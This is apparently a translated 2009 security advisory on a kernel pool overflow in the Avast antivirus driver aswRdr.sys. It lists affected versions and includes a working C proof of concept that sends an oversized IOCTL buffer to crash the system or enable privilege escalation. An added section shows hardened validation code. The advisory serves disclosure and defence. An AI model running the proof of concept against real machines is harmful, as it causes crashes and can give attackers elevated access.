Avast! Antivirus 'aswRdr.sys' Driver Local Privilege Escalation Vulnerability

Source: 岁月联盟    Editor: zhuzhu    Date: 2009-11-19
Avast! Antivirus affected versions:

Avast! Antivirus Professional Edition 4.8.1356
Avast! Antivirus Professional Edition 4.8.1351
Avast! Antivirus Professional Edition 4.8.1335
Avast! Antivirus Professional Edition 4.8.1169
Avast! Antivirus Professional Edition 4.7.1098
Avast! Antivirus Professional Edition 4.7.1043
Avast! Antivirus Professional Edition 4.7.844
Avast! Antivirus Professional Edition 4.7.827
Avast! Antivirus Professional Edition 4.6.691
Avast! Antivirus Professional Edition 4.6.665
Avast! Antivirus Professional Edition 4.6.652
Avast! Antivirus Professional Edition 4.6.603
Avast! Antivirus Professional Edition 4.6
Avast! Antivirus Professional Edition 4.0
Avast! Antivirus Home Edition 4.8.1356
Avast! Antivirus Home Edition 4.8.1351
Avast! Antivirus Home Edition 4.8.1335
Avast! Antivirus Home Edition 4.8.1169
Avast! Antivirus Home Edition 4.7.1098
Avast! Antivirus Home Edition 4.7.1043
Avast! Antivirus Home Edition 4.7.869
Avast! Antivirus Home Edition 4.7.844
Avast! Antivirus Home Edition 4.7.827
Avast! Antivirus Home Edition 4.6.691
Avast! Antivirus Home Edition 4.6.665
Avast! Antivirus Home Edition 4.6.655
Avast! Antivirus Home Edition 4.6.652
Avast! Antivirus Home Edition 4.6
Avast! Antivirus Home Edition 4.0
Vulnerability description:

Bugtraq ID: 37031

Avast! Antivirus Professional is a popular anti-virus application. Avast's aswRdr.sys driver does not validate the user-supplied input of an IOCTL request. A malformed request can overflow a kernel pool (heap) allocation; the result is a system crash (blue screen) and potentially local privilege escalation.
References:
http://www.securityfocus.com/archive/1/507891

Test method: [www.sebug.net]

The programs (methods) provided on this site may be offensive in nature and are intended only for security research and teaching; use them at your own risk!
/*
 * Avast 4.8.1356.0 antivirus aswRdr.sys Kernel Pool Corruption
 *
 * Author(s): Giuseppe 'Evilcry' Bonfa'
 *            AbdulAziz Hariri
 * E-Mail:    evilcry _AT_ gmail _DOT_ com
 * Website:   http://evilcry.netsons.org
 *            http://evilcodecave.blogspot.com
 *            http://evilcodecave.wordpress.com
 *            http://evilfingers.com
 *
 * Disclosure Timeline: As specified in the Advisory.
 */

#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>

/* Open the driver's device object by name (taken from esagelab). On Windows 2000
 * and later the \\.\Global\ prefix is used, on older versions plain \\.\ . */
BOOL OpenDevice(PWSTR DriverName, HANDLE *lphDevice)
{
    WCHAR  DeviceName[MAX_PATH];
    HANDLE hDevice;

    if ((GetVersion() & 0xFF) >= 5)
    {
        wcscpy(DeviceName, L"\\\\.\\Global\\");
    }
    else
    {
        wcscpy(DeviceName, L"\\\\.\\");
    }
    wcscat(DeviceName, DriverName);

    printf("Opening.. %S\n", DeviceName);

    hDevice = CreateFileW(DeviceName, GENERIC_READ | GENERIC_WRITE, 0,
                          NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("CreateFile() ERROR %d\n", GetLastError());
        return FALSE;
    }

    *lphDevice = hDevice;
    return TRUE;
}

int main()
{
    HANDLE hDev = NULL;
    DWORD  Junk;

    if (!OpenDevice(L"aswRDR", &hDev))
    {
        printf("Unable to access aswMon");
        return (0);
    }

    /* 0x156-byte buffer filled with 'A', passed as both input and output
     * buffer of IOCTL 0x80002024; the driver does not validate its length. */
    char *Buff = (char *)VirtualAlloc(NULL, 0x156, MEM_RESERVE | MEM_COMMIT,
                                      PAGE_EXECUTE_READWRITE);
    if (Buff)
    {
        memset(Buff, 'A', 0x156);
        DeviceIoControl(hDev, 0x80002024, Buff, 0x156, Buff, 0x156, &Junk,
                        (LPOVERLAPPED)NULL);
        printf("DeviceIoControl Executed..\n");
    }
    else
    {
        printf("VirtualAlloc() ERROR %d\n", GetLastError());
    }

    return (0);
}
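The following is an added example and is not part of the advisory, the PoC above, or Avast's driver. It models in portable, user-mode C what an IOCTL dispatch routine must do before copying a caller-supplied buffer into a kernel pool allocation: validate the header, check the declared payload length against the bytes the caller actually passed, and check it against the destination allocation. The request layout, the magic value, the status codes and all function names are assumptions constructed for this illustration; the "unchecked" helper only reports the length a handler without validation would have trusted, it performs no copy. The scenarios feed the hardened handler the same 0x156-byte buffer of 'A' that the PoC sends, plus a well-formed and a truncated request.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Constructed request layout for a hypothetical METHOD_BUFFERED IOCTL:
 * a fixed header carrying a caller-declared payload length, then the payload. */
typedef struct {
    uint32_t magic;        /* must equal REQUEST_MAGIC */
    uint32_t payload_len;  /* caller-declared, therefore untrusted */
} request_header_t;

#define REQUEST_MAGIC  0x52445341u  /* constructed value for this example */
#define MAX_PAYLOAD    0x100u       /* size of the pool block we copy into */

typedef enum {
    IOCTL_OK = 0,
    IOCTL_BUFFER_TOO_SMALL = 1,
    IOCTL_INVALID_PARAMETER = 2
} ioctl_status_t;

typedef struct { ioctl_status_t status; size_t copied; } scenario_result_t;

/* Length a handler WITHOUT validation would trust: it reads payload_len straight
 * out of the user buffer and would use it as the memcpy size. No copy is done here. */
uint32_t unchecked_declared_length(const uint8_t *in, size_t in_len)
{
    request_header_t hdr;
    if (in_len < sizeof hdr)
        return 0;
    memcpy(&hdr, in, sizeof hdr);
    return hdr.payload_len;
}

/* Hardened handler: every length is validated against the buffer the caller
 * actually supplied and against the destination allocation before any copy. */
ioctl_status_t handle_ioctl_checked(const uint8_t *in, size_t in_len,
                                    uint8_t *pool, size_t pool_len, size_t *copied)
{
    request_header_t hdr;

    *copied = 0;
    if (in == NULL || in_len < sizeof hdr)
        return IOCTL_BUFFER_TOO_SMALL;

    /* Copy the header out once and validate the copy, so user mode cannot change
     * the length between the check and the use (no double fetch). */
    memcpy(&hdr, in, sizeof hdr);

    if (hdr.magic != REQUEST_MAGIC)
        return IOCTL_INVALID_PARAMETER;
    if (hdr.payload_len > MAX_PAYLOAD)
        return IOCTL_INVALID_PARAMETER;
    if (hdr.payload_len > in_len - sizeof hdr)   /* declared > actually supplied */
        return IOCTL_BUFFER_TOO_SMALL;
    if (hdr.payload_len > pool_len)              /* would overflow destination */
        return IOCTL_BUFFER_TOO_SMALL;

    memcpy(pool, in + sizeof hdr, hdr.payload_len);
    *copied = hdr.payload_len;
    return IOCTL_OK;
}

/* Scenario 1: the PoC's 0x156 bytes of 'A' (constructed here, not sent anywhere). */
scenario_result_t scenario_poc_buffer(void)
{
    uint8_t in[0x156], pool[MAX_PAYLOAD];
    scenario_result_t r;
    memset(in, 'A', sizeof in);
    r.status = handle_ioctl_checked(in, sizeof in, pool, sizeof pool, &r.copied);
    return r;
}

uint32_t scenario_poc_trusted_length(void)
{
    uint8_t in[0x156];
    memset(in, 'A', sizeof in);
    return unchecked_declared_length(in, sizeof in);   /* 0x41414141 */
}

/* Scenario 2: well-formed request with a 16-byte payload. */
scenario_result_t scenario_valid(void)
{
    uint8_t in[sizeof(request_header_t) + 16], pool[MAX_PAYLOAD];
    request_header_t hdr = { REQUEST_MAGIC, 16 };
    scenario_result_t r;
    memcpy(in, &hdr, sizeof hdr);
    memset(in + sizeof hdr, 0x42, 16);
    r.status = handle_ioctl_checked(in, sizeof in, pool, sizeof pool, &r.copied);
    return r;
}

/* Scenario 3: header claims 64 payload bytes but only 8 were supplied. */
scenario_result_t scenario_truncated(void)
{
    uint8_t in[sizeof(request_header_t) + 8], pool[MAX_PAYLOAD];
    request_header_t hdr = { REQUEST_MAGIC, 64 };
    scenario_result_t r;
    memcpy(in, &hdr, sizeof hdr);
    memset(in + sizeof hdr, 0x42, 8);
    r.status = handle_ioctl_checked(in, sizeof in, pool, sizeof pool, &r.copied);
    return r;
}

int main(void)
{
    scenario_result_t a = scenario_poc_buffer();
    scenario_result_t b = scenario_valid();
    scenario_result_t c = scenario_truncated();
    printf("PoC buffer: status=%d copied=%zu; unchecked handler would trust 0x%x bytes\n",
           a.status, a.copied, scenario_poc_trusted_length());
    printf("valid request: status=%d copied=%zu\n", b.status, b.copied);
    printf("truncated request: status=%d copied=%zu\n", c.status, c.copied);
    return 0;
}
```

The ordering of the checks matters: the header is fetched into kernel-owned storage once, then every comparison uses that copy, and the declared length is bounded by both the supplied input length and the destination size before `memcpy` runs. An all-'A' buffer is rejected at the magic check, but even a request with a valid magic cannot make the handler copy more than the caller actually supplied or more than the pool block holds.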
Security recommendations:

No detailed fix is currently available; see the vendor at http://avast.com/
